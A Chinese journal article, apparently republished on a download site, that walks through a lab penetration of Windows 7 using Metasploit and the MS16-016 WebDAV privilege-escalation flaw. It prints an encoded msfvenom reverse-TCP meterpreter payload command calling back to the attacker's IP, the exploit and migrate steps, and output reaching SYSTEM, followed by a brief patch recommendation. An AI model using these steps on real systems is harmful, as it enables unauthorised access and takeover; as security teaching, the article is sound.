基于Metasploit的MS16-016本地溢出漏洞利用实战 下载本文

内容发布更新时间 : 2024/5/18 11:03:46星期一 下面是文章的全部内容请认真阅读。

龙源期刊网 http://www.qikan.com.cn

基于Metasploit的MS16-016本地溢出漏洞利用实战

作者:赵秋

来源:《电脑知识与技术》2018年第31期

摘要: 该文对MS16-016本地溢出漏洞做了简单介绍,文中分析了利用MS16-016本地溢出漏洞,渗透到Windows 7中并获取系统权限的实现方式,最后给出了对应的防范措施。 关键词: Metasploit;MS16-016;本地溢出漏洞

中图分类号:TP393; ; ; 文献标识码:A; ; ; 文章编号:1009-3044(2018)31-0216-01 1 漏洞介绍

MS16-016这个漏洞是由于Windows中的WebDAV未正确处理WebDAV客户端发送的信息导致的。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。此漏洞存在于在:Windows Vista SP2、Windows Server 2008 x86 & x64、Windows Server 2008 R2 x64、Windows 7 x86 & x64、Windows 8.1 x86 & x64。系统中提升权限至系统权限,以下系统中导致系统拒绝服务(蓝屏):Windows Server 2012、Windows Server 2012 R2、Windows RT 8.1、Windows 10。 2 MS16-016本地溢出漏洞利用的实现

下面介绍在Kali中渗透Windows 7 x86的实现。Kali的IP地址为10.3.81.106,Windows 7 x86的IP地址为10.3.81.152,使用虚拟机kali 中的Metasploit利用MS16-016本地溢出漏洞对Windows 7的进行渗透,从而获得系统权限。

1) 在Kali上生成连接软件msf.exe,LHOST为Kali的IP地址

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.3.81.106 LPORT=4444 -f exe > msf.exe 2)在命令行下输入“msfconsole”,进入MSF的启动界面 root@kali:~# msfconsole

3)在Metasploit命令提示符下,使用use命令载入监听模块。设置payload为windows/meterpreter/reverse_tcp。设置本地监听主机IP地址为Kali的IP。可以使用show options查看相关参数,输入exploit命令开始监听。

龙源期刊网 http://www.qikan.com.cn

4)将软件msf.exe发给Windows 7上运行,此时kali上会有连接提示,可以看见MSF弹回了一个session 1(会话连接)。接着,在Meterpreter Shell中利用getuid命令查看已获得的权限为user权限。我们要把它提升到system权限,即Windows最高权限。

5)输入命令background,把当前的metasploit shell转为后台执行。选择MS16-016这个漏洞在进行提权,同时设置刚才连接的ID为1。最后,执行exploit命令进行提权,可以看到成功的把漏洞利用到了PID为2872的进程中。

6)虽然提权成功了,但连接到的ID为1的会话连接中,执行getuid命令还是看见的是user权限。

msf exploit(windows/local/ms16_016_webdav) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid

Server username: cmx-PC\cmx

7)使用migrate 命令,迁移到该进程ID中。 meterpreter > migrate 2872 [*] Migrating from 4068 to 2872... [*] Migration completed successfully.

8)然后执行getuid命令再次查看权限,可以看到已经是系统权限了,输入shell测试。 meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 608 created. Channel 1 created.

Microsoft Windows [版本 6.1.7601]

版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

龙源期刊网 http://www.qikan.com.cn

C:\Users\cmx\Desktop> 3 MS16-016本地溢出漏洞的防御

你也可以通过 Windows 更新获取此更新程序。在你开启自动更新后,系统会自动下载并安装此更新程序。https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2016/ms16-016用户可从此获取独立的更新程序包。此安全更新程序通过更正WebDAV验证输入的方式来修复这个漏洞。 参考文献:

[1] 祝烈煌,张子剑.网络攻防实战研究漏洞利用与提权[M].北京:电子工业出版社,2018. [2][英]Nipun Jaswal,李华峰.精通Metasploit渗透测试[M]. 2版.北京:人民邮电出版社,2017.

[3] http://www.freebuf.com/vuls/95950.html.